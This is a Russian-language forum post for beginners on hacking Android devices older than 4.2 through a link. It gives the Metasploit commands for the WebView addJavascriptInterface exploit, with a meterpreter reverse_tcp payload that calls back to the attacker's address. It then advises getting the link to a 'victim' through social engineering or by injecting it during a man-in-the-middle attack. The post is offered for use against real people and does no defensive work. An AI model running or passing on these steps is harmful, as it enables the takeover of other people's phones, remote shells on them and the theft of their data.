Android WebView Exploit(Или взлом андроида по ссылке)

Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)

Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств

версии не больше (4.2.x) 

Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:

1)Запустить метасплоит

2)Выбераем наш эксплойт:

use exploit/android/browser/webview_addjavascriptinterface

3)Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.

set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединениеset SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j

4)Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...

5)Ловим метерпретер сессию

Источник